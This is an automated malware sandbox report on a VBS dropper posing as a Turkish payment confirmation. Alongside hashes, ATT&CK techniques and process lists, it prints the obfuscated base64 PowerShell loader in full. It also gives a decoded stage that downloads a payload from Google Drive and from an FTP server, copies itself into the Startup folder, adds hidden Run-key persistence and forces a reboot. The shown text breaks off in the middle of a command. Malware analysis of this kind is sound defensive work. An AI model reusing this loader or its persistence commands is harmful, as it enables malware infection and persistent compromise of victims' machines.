63c0755410ad88fd4567e6065fe9b0ab50ccc6a523bed1badd00af9e9b584180

Analysis

max time kernel
73s
max time network
63s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
31-10-2024 13:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ödeme Onayı.vbs
Size

585KB
MD5

e8b451ec06c7782196418eb73e4b0731
SHA1

0b0b23f532f7e6241fabe6eb5cb1e8490b3dd1f4
SHA256

3e0f0059d28f652c2575514c53d31dbfa1c96bd13d1f3457a22fd0dca5336011
SHA512

a3b40c48836fe2dcb84c3803a1a815039a93b4463e0acbe90372610b64663d40c6642461cfa8931bcb199cb43f842f9552e08b95d7108578847b14cbb7742918
SSDEEP

1536:l/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/Q/F/i/i/i/i/i/i/i/i/i/i/i/i/iW:j3Jg6azbLal3Jg6azbLal3Jg6azbLaO

Score

10^/10

defense_evasion discovery execution persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://drive.google.com/uc?export=download&id=

Signatures

Blocklisted process makes network request 20 IoCs

flow	pid	Process
12	4504	powershell.exe
25	4504	powershell.exe
28	2380	powershell.exe
34	4504	powershell.exe
35	4504	powershell.exe
37	4504	powershell.exe
39	4504	powershell.exe
40	4504	powershell.exe
53	4504	powershell.exe
54	4504	powershell.exe
55	4504	powershell.exe
56	4504	powershell.exe
57	4504	powershell.exe
58	4504	powershell.exe
59	4504	powershell.exe
60	4504	powershell.exe
64	4504	powershell.exe
65	4504	powershell.exe
68	4504	powershell.exe
69	4504	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4620	powershell.exe
4504	powershell.exe
1184	powershell.exe
4672	powershell.exe
2460	powershell.exe
4740	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ödeme Onayı.vbs	cmd.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update Drivers NVIDEO_wma = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\iebos.ps1' \";exit"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update Drivers NVIDEO_yla = "cmd.exe /c start /min \"\" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command \". 'C:\\Users\\Admin\\AppData\\LocalLow\\Daft Sytem\\iebos.ps1' \";exit"	powershell.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4808	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4808	PING.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4620	powershell.exe
4620	powershell.exe
4504	powershell.exe
4504	powershell.exe
2380	powershell.exe
2380	powershell.exe
4672	powershell.exe
1184	powershell.exe
4672	powershell.exe
1184	powershell.exe
4672	powershell.exe
1184	powershell.exe
2460	powershell.exe
2460	powershell.exe
2460	powershell.exe
4740	powershell.exe
4740	powershell.exe
4740	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	4620	powershell.exe
Token: SeDebugPrivilege	4504	powershell.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	4672	powershell.exe
Token: SeDebugPrivilege	1184	powershell.exe
Token: SeDebugPrivilege	2460	powershell.exe
Token: SeDebugPrivilege	4740	powershell.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 980 wrote to memory of 4620	980	WScript.exe	84
PID 980 wrote to memory of 4620	980	WScript.exe	84
PID 4620 wrote to memory of 4504	4620	powershell.exe	86
PID 4620 wrote to memory of 4504	4620	powershell.exe	86
PID 4504 wrote to memory of 4072	4504	powershell.exe	95
PID 4504 wrote to memory of 4072	4504	powershell.exe	95
PID 4504 wrote to memory of 4808	4504	powershell.exe	96
PID 4504 wrote to memory of 4808	4504	powershell.exe	96
PID 4504 wrote to memory of 2380	4504	powershell.exe	100
PID 4504 wrote to memory of 2380	4504	powershell.exe	100
PID 4504 wrote to memory of 4672	4504	powershell.exe	102
PID 4504 wrote to memory of 4672	4504	powershell.exe	102
PID 4504 wrote to memory of 1184	4504	powershell.exe	103
PID 4504 wrote to memory of 1184	4504	powershell.exe	103
PID 4504 wrote to memory of 4108	4504	powershell.exe	104
PID 4504 wrote to memory of 4108	4504	powershell.exe	104
PID 4504 wrote to memory of 2460	4504	powershell.exe	108
PID 4504 wrote to memory of 2460	4504	powershell.exe	108
PID 4504 wrote to memory of 4740	4504	powershell.exe	109
PID 4504 wrote to memory of 4740	4504	powershell.exe	109
PID 4504 wrote to memory of 3412	4504	powershell.exe	110
PID 4504 wrote to memory of 3412	4504	powershell.exe	110
PID 4504 wrote to memory of 2616	4504	powershell.exe	111
PID 4504 wrote to memory of 2616	4504	powershell.exe	111
PID 4504 wrote to memory of 572	4504	powershell.exe	112
PID 4504 wrote to memory of 572	4504	powershell.exe	112
PID 4504 wrote to memory of 2900	4504	powershell.exe	113
PID 4504 wrote to memory of 2900	4504	powershell.exe	113
PID 4504 wrote to memory of 2200	4504	powershell.exe	118
PID 4504 wrote to memory of 2200	4504	powershell.exe	118
PID 4504 wrote to memory of 864	4504	powershell.exe	119
PID 4504 wrote to memory of 864	4504	powershell.exe	119
PID 4504 wrote to memory of 4796	4504	powershell.exe	120
PID 4504 wrote to memory of 4796	4504	powershell.exe	120
PID 4504 wrote to memory of 4496	4504	powershell.exe	121
PID 4504 wrote to memory of 4496	4504	powershell.exe	121
PID 4504 wrote to memory of 3264	4504	powershell.exe	122
PID 4504 wrote to memory of 3264	4504	powershell.exe	122
PID 4504 wrote to memory of 2644	4504	powershell.exe	123
PID 4504 wrote to memory of 2644	4504	powershell.exe	123
PID 4504 wrote to memory of 2532	4504	powershell.exe	124
PID 4504 wrote to memory of 2532	4504	powershell.exe	124
PID 4504 wrote to memory of 2084	4504	powershell.exe	125
PID 4504 wrote to memory of 2084	4504	powershell.exe	125
PID 4504 wrote to memory of 4352	4504	powershell.exe	126
PID 4504 wrote to memory of 4352	4504	powershell.exe	126
PID 4504 wrote to memory of 2460	4504	powershell.exe	127
PID 4504 wrote to memory of 2460	4504	powershell.exe	127
PID 4504 wrote to memory of 1416	4504	powershell.exe	129
PID 4504 wrote to memory of 1416	4504	powershell.exe	129
PID 4504 wrote to memory of 2940	4504	powershell.exe	130
PID 4504 wrote to memory of 2940	4504	powershell.exe	130

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:980
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQARAAgAEQAJwAgACwAIA' + [char]66 + 'vAFQAUg' + [char]66 + 'oAFgAJAAgACwAIAAnAGgAdA' + [char]66 + '0AHAAcwA6AC8ALw' + [char]66 + 'uAGUAdQ' + [char]66 + '0AHIAYQ' + [char]66 + 'sAGQAZQ' + [char]66 + 'zAGkAZw' + [char]66 + 'uAC4AYw' + [char]66 + 'vAC8AegAuAHQAeA' + [char]66 + '0ACcAIAAoACAAXQ' + [char]66 + 'dAFsAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAG8AWwAgACwAIA' + [char]66 + 'sAGwAdQ' + [char]66 + 'uACQAIAAoAGUAaw' + [char]66 + 'vAHYAbg' + [char]66 + 'JAC4AKQAgAG0ARw' + [char]66 + 'xAGkAbgAkACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + 'FAGYAWA' + [char]66 + 'zAGcAJAAgACsAIA' + [char]66 + 'HAGkAVA' + [char]66 + '6AEoAJAAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAuACkAIA' + [char]66 + '6AGQAZg' + [char]66 + '5AEYAJAAgACgAZA' + [char]66 + 'hAG8ATAAuAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHQAbg' + [char]66 + 'lAHIAcg' + [char]66 + '1AEMAOgA6AF0Abg' + [char]66 + 'pAGEAbQ' + [char]66 + 'vAEQAcA' + [char]66 + 'wAEEALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAJw' + [char]66 + 'JAFYARg' + [char]66 + 'yAHAAJwAgAD0AIA' + [char]66 + 'tAEcAcQ' + [char]66 + 'pAG4AJAA7ACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAgAD0AIA' + [char]66 + 'FAGYAWA' + [char]66 + 'zAGcAJAA7ACcALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAIAA9ACAARw' + [char]66 + 'pAFQAeg' + [char]66 + 'KACQAOwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAgAD0AIA' + [char]66 + 'vAFQAUg' + [char]66 + 'oAFgAJAA7ACkAIAApACcAQQAnACwAJwCTIToAkyEnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAGgAaA' + [char]66 + 'sAHgAdwAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bADsAIAApADgARg' + [char]66 + 'UAFUAIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALQAgAHEAeA' + [char]66 + 'UAGIAbwAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAAaA' + [char]66 + 'oAGwAeA' + [char]66 + '3ACQAOwAgACAAfQAgAGcAbg' + [char]66 + 'pAHMAcg' + [char]66 + 'hAFAAYw' + [char]66 + 'pAHMAYQ' + [char]66 + 'CAGUAcw' + [char]66 + 'VAC0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGUAbA' + [char]66 + 'pAEYAdA' + [char]66 + '1AE8ALQAgAHAAYg' + [char]66 + 'yAHYAcwAkACAASQ' + [char]66 + 'SAFUALQAgAHQAcw' + [char]66 + 'lAHUAcQ' + [char]66 + 'lAFIAYg' + [char]66 + 'lAFcALQ' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQA7ACAAKQAgAHEAeA' + [char]66 + 'UAGIAbwAkACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACAAKAAgAD0AIA' + [char]66 + 'wAGIAcg' + [char]66 + '2AHMAJAA7ACAAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAoACAAPQAgAHEAeA' + [char]66 + 'UAGIAbwAkAHsAIA' + [char]66 + 'kAG4AYQ' + [char]66 + 'tAG0Abw' + [char]66 + 'jAC0AIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgADEALgAwAC4AMAAuADcAMgAxACAAZw' + [char]66 + 'uAGkAcAA7ACAAYwAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'kAG0AYwA7AGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAGMAJAAgAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMALQAgAGcAbg' + [char]66 + 'pAHMAcg' + [char]66 + 'hAFAAYw' + [char]66 + 'pAHMAYQ' + [char]66 + 'CAGUAcw' + [char]66 + 'VAC0AIA' + [char]66 + 'xAHgAVA' + [char]66 + 'iAG8AJAAgAGUAbA' + [char]66 + 'pAEYAdA' + [char]66 + '1AE8ALQAgAHcAeQ' + [char]66 + 'rAG4AagAkACAASQ' + [char]66 + 'SAFUALQAgAHQAcw' + [char]66 + 'lAHUAcQ' + [char]66 + 'lAFIAYg' + [char]66 + 'lAFcALQ' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQA7ACkAKQApACkAKQAgADQANgAsADQANgAsADYANQAsADUANQAsADMANQAsADkANAAsADkAOAAsADcANwAsADYANgAsADUAOAAsACAANwA5ACwAIAAxADIAMQAsACAAMQA3ACAALAA5ADEAMQAgACwAMAA3ACAALAA2ADYAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAgAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAC0AIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAEYALQAgAHQAeA' + [char]66 + 'lAFQAbg' + [char]66 + 'pAGEAbA' + [char]66 + 'QAHMAQQAtACAAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMAZQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALQ' + [char]66 + 'vAFQAdA' + [char]66 + 'yAGUAdg' + [char]66 + 'uAG8AQwAoACAALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAUw' + [char]66 + 'QACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAGMAJAA7ACkAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHEAeA' + [char]66 + 'UAGIAbwAkADsAKQAgACcAdA' + [char]66 + '4AHQALgAxADAATA' + [char]66 + 'MAEQALwAxADAALwAnACAAKwAgACcAcg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACgAIAA9ACAAdw' + [char]66 + '5AGsAbg' + [char]66 + 'qACQAOwAgADIAMQ' + [char]66 + 'zAGwAVAA6ADoAXQ' + [char]66 + 'lAHAAeQ' + [char]66 + 'UAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bADsAIA' + [char]66 + '9AGUAdQ' + [char]66 + 'yAHQAJA' + [char]66 + '7ACAAPQAgAGsAYw' + [char]66 + 'hAGIAbA' + [char]66 + 'sAGEAQw' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAZA' + [char]66 + 'pAGwAYQ' + [char]66 + 'WAGUAdA' + [char]66 + 'hAGMAaQ' + [char]66 + 'mAGkAdA' + [char]66 + 'yAGUAQw' + [char]66 + 'yAGUAdg' + [char]66 + 'yAGUAUwA6ADoAXQ' + [char]66 + 'yAGUAZw' + [char]66 + 'hAG4AYQ' + [char]66 + 'NAHQAbg' + [char]66 + 'pAG8AUA' + [char]66 + 'lAGMAaQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AIA' + [char]66 + 'mAC8AIAAwACAAdAAvACAAcgAvACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'uAHcAbw' + [char]66 + 'kAHQAdQ' + [char]66 + 'oAHMAIAA7ACcAMAA4ADEAIA' + [char]66 + 'wAGUAZQ' + [char]66 + 'sAHMAJwAgAGQAbg' + [char]66 + 'hAG0AbQ' + [char]66 + 'vAGMALQAgAGUAeA' + [char]66 + 'lAC4AbA' + [char]66 + 'sAGUAaA' + [char]66 + 'zAHIAZQ' + [char]66 + '3AG8AcAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIAApACAAJw' + [char]66 + 'wAHUAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + 'tAGEAcg' + [char]66 + 'nAG8Acg' + [char]66 + 'QAFwAdQ' + [char]66 + 'uAGUATQAgAHQAcg' + [char]66 + 'hAHQAUw' + [char]66 + 'cAHMAdw' + [char]66 + 'vAGQAbg' + [char]66 + 'pAFcAXA' + [char]66 + '0AGYAbw' + [char]66 + 'zAG8Acg' + [char]66 + 'jAGkATQ' + [char]66 + 'cAGcAbg' + [char]66 + 'pAG0AYQ' + [char]66 + 'vAFIAXA' + [char]66 + 'hAHQAYQ' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AFwAJwAgACsAIA' + [char]66 + 'mAEQAWQ' + [char]66 + 'jAG0AJAAgACgAIA' + [char]66 + 'uAG8AaQ' + [char]66 + '0AGEAbg' + [char]66 + 'pAHQAcw' + [char]66 + 'lAEQALQAgACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAbQ' + [char]66 + 'lAHQASQAtAHkAcA' + [char]66 + 'vAEMAIAA7ACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'zAGUAcg' + [char]66 + 'vAG4ALwAgAHQAZQ' + [char]66 + 'pAHUAcQAvACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'hAHMAdQ' + [char]66 + '3ACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wACAAOwApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACgAIAA9ACAAQg' + [char]66 + 'sAHAAaw' + [char]66 + '0ADsAKQAgAGUAbQ' + [char]66 + 'hAE4Acg' + [char]66 + 'lAHMAVQA6ADoAXQ' + [char]66 + '0AG4AZQ' + [char]66 + 'tAG4Abw' + [char]66 + 'yAGkAdg' + [char]66 + 'uAEUAWwAgACsAIAAnAFwAcw' + [char]66 + 'yAGUAcw' + [char]66 + 'VAFwAOg' + [char]66 + 'DACcAKAAgAD0AIA' + [char]66 + 'mAEQAWQ' + [char]66 + 'jAG0AJAA7ACkAIAApACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACgAIAAsAGwAbg' + [char]66 + 'qAHQAdwAkACgAZQ' + [char]66 + 'sAGkARg' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '2AGoAdw' + [char]66 + '3AGMAJAA7ADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4Adg' + [char]66 + 'qAHcAdw' + [char]66 + 'jACQAOwApAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4AIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIATwAtAHcAZQ' + [char]66 + 'OACgAIAA9ACAAdg' + [char]66 + 'qAHcAdw' + [char]66 + 'jACQAOw' + [char]66 + '9ADsAIAApACcAdA' + [char]66 + 'PAEwAYw' + [char]66 + 'fAEsAYQAzAFoAZg' + [char]66 + 'vAFgAMg' + [char]66 + 'KAEoAcg' + [char]66 + 'WAGgAbQ' + [char]66 + 'WADkAYw' + [char]66 + 'tADkAWA' + [char]66 + 'zAHUAWA' + [char]66 + 'tAGoAMQ' + [char]66 + 'nADEAJwAgACsAIA' + [char]66 + 'sAG4Aag' + [char]66 + '0AHcAJAAoACAAPQAgAGwAbg' + [char]66 + 'qAHQAdwAkAHsAIA' + [char]66 + 'lAHMAbA' + [char]66 + 'lAH0AOwAgACkAJwAyADQAdQ' + [char]66 + 'YAEoAVA' + [char]66 + 'xAGEAbQ' + [char]66 + 'nAHkATQ' + [char]66 + '0AEYAeg' + [char]66 + 'hAGsAUA' + [char]66 + 'SADEAcQ' + [char]66 + 'fAEkAdg' + [char]66 + 'HAGkAWA' + [char]66 + 'OAGQAcQ' + [char]66 + 'hAE4AMQAnACAAKwAgAGwAbg' + [char]66 + 'qAHQAdwAkACgAIAA9ACAAbA' + [char]66 + 'uAGoAdA' + [char]66 + '3ACQAewAgACkAIA' + [char]66 + 'EAFcAZw' + [char]66 + 'WAHEAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAJwA0ADYAJwAoAHMAbg' + [char]66 + 'pAGEAdA' + [char]66 + 'uAG8AQwAuAEUAUg' + [char]66 + 'VAFQAQw' + [char]66 + 'FAFQASQ' + [char]66 + 'IAEMAUg' + [char]66 + '' + [char]66 + 'AF8AUg' + [char]66 + 'PAFMAUw' + [char]66 + 'FAEMATw' + [char]66 + 'SAFAAOg' + [char]66 + '2AG4AZQAkACAAPQAgAEQAVw' + [char]66 + 'nAFYAcQAkADsAJwA9AGQAaQAmAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8AZAA9AHQAcg' + [char]66 + 'vAHAAeA' + [char]66 + 'lAD8AYw' + [char]66 + '1AC8AbQ' + [char]66 + 'vAGMALg' + [char]66 + 'lAGwAZw' + [char]66 + 'vAG8AZwAuAGUAdg' + [char]66 + 'pAHIAZAAvAC8AOg' + [char]66 + 'zAHAAdA' + [char]66 + '0AGgAJwAgAD0AIA' + [char]66 + 'sAG4Aag' + [char]66 + '0AHcAJAA7ACkAIAAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACgAIA' + [char]66 + 'sAGUAZAA7ACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAewAgACkAIA' + [char]66 + 'WAGYAcg' + [char]66 + 'EAFEAJAAgACgAIA' + [char]66 + 'mAGkAOwAgACkAMgAoAHMAbA' + [char]66 + 'hAHUAcQ' + [char]66 + 'FAC4Acg' + [char]66 + 'vAGoAYQ' + [char]66 + 'NAC4Abg' + [char]66 + 'vAGkAcw' + [char]66 + 'yAGUAVgAuAHQAcw' + [char]66 + 'vAGgAJAAgAD0AIA' + [char]66 + 'WAGYAcg' + [char]66 + 'EAFEAJAAgADsA';$wfjhv = $qKKzc; ;$wfjhv = $qKKzc.replace('уЦϚ' , 'B') ;;$qjxvb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $wfjhv ) ); $qjxvb = $qjxvb[-1..-$qjxvb.Length] -join '';$qjxvb = $qjxvb.replace('%XRqhI%','C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs');powershell $qjxvb
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4620
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$wtjnl = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$wtjnl = ($wtjnl + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$wtjnl = ($wtjnl + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$cwwjv = (New-Object Net.WebClient);$cwwjv.Encoding = [System.Text.Encoding]::UTF8;$cwwjv.DownloadFile($wtjnl, ($TZWou + '\Upwin.msu') );$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\Ödeme Onayı.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;$jnkyw = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$obTxq = ( 